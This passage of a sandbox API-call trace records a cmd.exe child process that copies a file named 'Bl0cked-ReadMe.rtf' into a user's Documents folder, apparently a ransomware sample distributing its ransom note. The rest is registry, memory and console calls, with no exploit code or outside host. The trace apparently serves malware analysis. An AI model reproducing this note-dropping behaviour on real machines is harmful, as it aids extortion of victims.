[0140.771] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0140.772] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1ced10 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0140.772] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1cecf4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1cecf4*=0x1a) returned 1 [0140.772] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.772] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.772] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.772] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.772] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.772] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.773] SetConsoleInputExeNameW () returned 0x1 [0140.773] GetConsoleOutputCP () returned 0x1b5 [0140.773] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.773] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.773] exit (_Code=0) Process: id = "172" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16cc0" os_pid = "0xdf0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], 
"BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14988 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14989 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14990 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14991 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 14992 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14993 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14994 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14995 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14996 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 14997 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = 
"private_0x000000007ffdf000" filename = "" Region: id = 15998 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15999 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16000 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16001 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 16002 start_va = 0x540000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 16003 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 16004 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16005 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16006 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16007 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: 
"c:\\windows\\system32\\msvcrt.dll") Region: id = 16008 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16009 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16010 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16011 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16012 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 16013 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16014 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 16015 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 16016 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 16017 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 16018 start_va = 0xf0000 end_va = 0xf0fff entry_point = 
0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 16019 start_va = 0x550000 end_va = 0x650fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 16020 start_va = 0x660000 end_va = 0x125ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 16021 start_va = 0x1260000 end_va = 0x13c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001260000" filename = "" Thread: id = 229 os_tid = 0xdc8 [0141.598] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f8cc | out: lpSystemTimeAsFileTime=0x26f8cc*(dwLowDateTime=0x8e55d720, dwHighDateTime=0x1d440a9)) [0141.598] GetCurrentProcessId () returned 0xdf0 [0141.599] GetCurrentThreadId () returned 0xdc8 [0141.599] GetTickCount () returned 0x2c60c [0141.599] QueryPerformanceCounter (in: lpPerformanceCount=0x26f8c4 | out: lpPerformanceCount=0x26f8c4*=19838779671) returned 1 [0141.599] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0141.599] __set_app_type (_Type=0x1) [0141.599] __p__fmode () returned 0x76b331f4 [0141.599] __p__commode () returned 0x76b331fc [0141.600] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0141.600] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0141.600] GetCurrentThreadId () returned 0xdc8 [0141.600] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xdc8) returned 0x38 [0141.600] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.600] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0141.600] SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.600] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) 
returned 1 [0141.600] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f85c | out: phkResult=0x26f85c*=0x0) returned 0x2 [0141.601] VirtualQuery (in: lpAddress=0x26f893, lpBuffer=0x26f82c, dwLength=0x1c | out: lpBuffer=0x26f82c*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.601] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26f82c, dwLength=0x1c | out: lpBuffer=0x26f82c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0141.601] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f82c, dwLength=0x1c | out: lpBuffer=0x26f82c*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0141.601] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26f82c, dwLength=0x1c | out: lpBuffer=0x26f82c*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.601] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f82c, dwLength=0x1c | out: lpBuffer=0x26f82c*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0141.601] GetConsoleOutputCP () returned 0x1b5 [0141.601] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.601] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0141.601] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.601] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0141.601] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.601] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 
[0141.602] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.602] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0141.602] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.602] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0141.602] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.602] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0141.603] GetEnvironmentStringsW () returned 0x360198* [0141.603] FreeEnvironmentStringsW (penv=0x360198) returned 1 [0141.603] GetEnvironmentStringsW () returned 0x360198* [0141.603] FreeEnvironmentStringsW (penv=0x360198) returned 1 [0141.603] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e7cc | out: phkResult=0x26e7cc*=0x40) returned 0x0 [0141.603] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e7d4, lpData=0x26e7d8, lpcbData=0x26e7d0*=0x1000 | out: lpType=0x26e7d4*=0x0, lpData=0x26e7d8*=0xc0, lpcbData=0x26e7d0*=0x1000) returned 0x2 [0141.603] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e7d4, lpData=0x26e7d8, lpcbData=0x26e7d0*=0x1000 | out: lpType=0x26e7d4*=0x4, lpData=0x26e7d8*=0x1, lpcbData=0x26e7d0*=0x4) returned 0x0 [0141.603] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e7d4, lpData=0x26e7d8, lpcbData=0x26e7d0*=0x1000 | out: lpType=0x26e7d4*=0x0, lpData=0x26e7d8*=0x1, lpcbData=0x26e7d0*=0x1000) returned 0x2 [0141.603] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e7d4, lpData=0x26e7d8, lpcbData=0x26e7d0*=0x1000 | out: lpType=0x26e7d4*=0x4, lpData=0x26e7d8*=0x0, lpcbData=0x26e7d0*=0x4) returned 0x0 [0141.603] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e7d4, lpData=0x26e7d8, lpcbData=0x26e7d0*=0x1000 | out: lpType=0x26e7d4*=0x4, 
lpData=0x26e7d8*=0x40, lpcbData=0x26e7d0*=0x4) returned 0x0 [0141.603] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e7d4, lpData=0x26e7d8, lpcbData=0x26e7d0*=0x1000 | out: lpType=0x26e7d4*=0x4, lpData=0x26e7d8*=0x40, lpcbData=0x26e7d0*=0x4) returned 0x0 [0141.603] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e7d4, lpData=0x26e7d8, lpcbData=0x26e7d0*=0x1000 | out: lpType=0x26e7d4*=0x0, lpData=0x26e7d8*=0x40, lpcbData=0x26e7d0*=0x1000) returned 0x2 [0141.603] RegCloseKey (hKey=0x40) returned 0x0 [0141.603] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e7cc | out: phkResult=0x26e7cc*=0x40) returned 0x0 [0141.604] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e7d4, lpData=0x26e7d8, lpcbData=0x26e7d0*=0x1000 | out: lpType=0x26e7d4*=0x0, lpData=0x26e7d8*=0x40, lpcbData=0x26e7d0*=0x1000) returned 0x2 [0141.604] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e7d4, lpData=0x26e7d8, lpcbData=0x26e7d0*=0x1000 | out: lpType=0x26e7d4*=0x4, lpData=0x26e7d8*=0x1, lpcbData=0x26e7d0*=0x4) returned 0x0 [0141.604] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e7d4, lpData=0x26e7d8, lpcbData=0x26e7d0*=0x1000 | out: lpType=0x26e7d4*=0x0, lpData=0x26e7d8*=0x1, lpcbData=0x26e7d0*=0x1000) returned 0x2 [0141.604] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e7d4, lpData=0x26e7d8, lpcbData=0x26e7d0*=0x1000 | out: lpType=0x26e7d4*=0x4, lpData=0x26e7d8*=0x0, lpcbData=0x26e7d0*=0x4) returned 0x0 [0141.604] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e7d4, lpData=0x26e7d8, lpcbData=0x26e7d0*=0x1000 | out: lpType=0x26e7d4*=0x4, lpData=0x26e7d8*=0x9, lpcbData=0x26e7d0*=0x4) returned 0x0 [0141.604] 
RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e7d4, lpData=0x26e7d8, lpcbData=0x26e7d0*=0x1000 | out: lpType=0x26e7d4*=0x4, lpData=0x26e7d8*=0x9, lpcbData=0x26e7d0*=0x4) returned 0x0 [0141.604] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e7d4, lpData=0x26e7d8, lpcbData=0x26e7d0*=0x1000 | out: lpType=0x26e7d4*=0x0, lpData=0x26e7d8*=0x9, lpcbData=0x26e7d0*=0x1000) returned 0x2 [0141.604] RegCloseKey (hKey=0x40) returned 0x0 [0141.604] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886370 [0141.604] srand (_Seed=0x5b886370) [0141.604] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"" [0141.604] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"" [0141.604] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.605] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3618f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0141.605] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0141.605] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0141.605] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.605] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0141.605] _wcsicmp 
(_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0141.605] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0141.605] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0141.605] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0141.605] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0141.605] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0141.605] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0141.605] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0141.605] GetEnvironmentStringsW () returned 0x3622e8* [0141.605] FreeEnvironmentStringsW (penv=0x3622e8) returned 1 [0141.605] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.605] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.606] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0141.606] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0141.606] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0141.606] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0141.606] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0141.606] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0141.606] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0141.606] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0141.606] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f598 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.606] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f598, lpFilePart=0x26f594 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f594*="Desktop") returned 0x18 [0141.606] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: 
"c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.606] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f314 | out: lpFindFileData=0x26f314) returned 0x360028 [0141.606] FindClose (in: hFindFile=0x360028 | out: hFindFile=0x360028) returned 1 [0141.606] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f314 | out: lpFindFileData=0x26f314) returned 0x360028 [0141.607] FindClose (in: hFindFile=0x360028 | out: hFindFile=0x360028) returned 1 [0141.607] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f314 | out: lpFindFileData=0x26f314) returned 0x360028 [0141.607] FindClose (in: hFindFile=0x360028 | out: hFindFile=0x360028) returned 1 [0141.607] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.607] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0141.607] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0141.607] GetEnvironmentStringsW () returned 0x362b08* [0141.607] FreeEnvironmentStringsW (penv=0x362b08) returned 1 [0141.607] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.608] GetConsoleOutputCP () returned 0x1b5 [0141.608] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.608] GetUserDefaultLCID () returned 0x409 [0141.608] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0141.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f6d8, cchData=128 | out: lpLCData="0") returned 2 [0141.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f6d8, cchData=128 | out: lpLCData="0") returned 2 [0141.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f6d8, cchData=128 | out: lpLCData="1") 
returned 2 [0141.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0141.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0141.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0141.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0141.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0141.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0141.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0141.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0141.609] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0141.609] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0141.609] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0141.610] GetConsoleTitleW (in: lpConsoleTitle=0x3508f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.611] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.611] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0141.611] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0141.611] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0141.612] _wcsicmp (_String1="type", _String2=")") returned 75 [0141.612] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0141.612] _wcsicmp 
(_String1="FOR/?", _String2="type") returned -14 [0141.612] _wcsicmp (_String1="IF", _String2="type") returned -11 [0141.612] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0141.612] _wcsicmp (_String1="REM", _String2="type") returned -2 [0141.612] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0141.617] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.617] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.617] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.617] GetFileType (hFile=0x7) returned 0x2 [0142.219] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0142.219] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f5d0 | out: lpMode=0x26f5d0) returned 1 [0142.221] _dup (_FileHandle=1) returned 3 [0142.221] _close (_FileHandle=1) returned 0 [0142.221] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0142.221] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x26f5a0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0142.223] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0142.223] GetConsoleTitleW (in: lpConsoleTitle=0x26f3d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.223] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0142.223] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0142.223] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0142.223] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0142.224] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0142.224] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, 
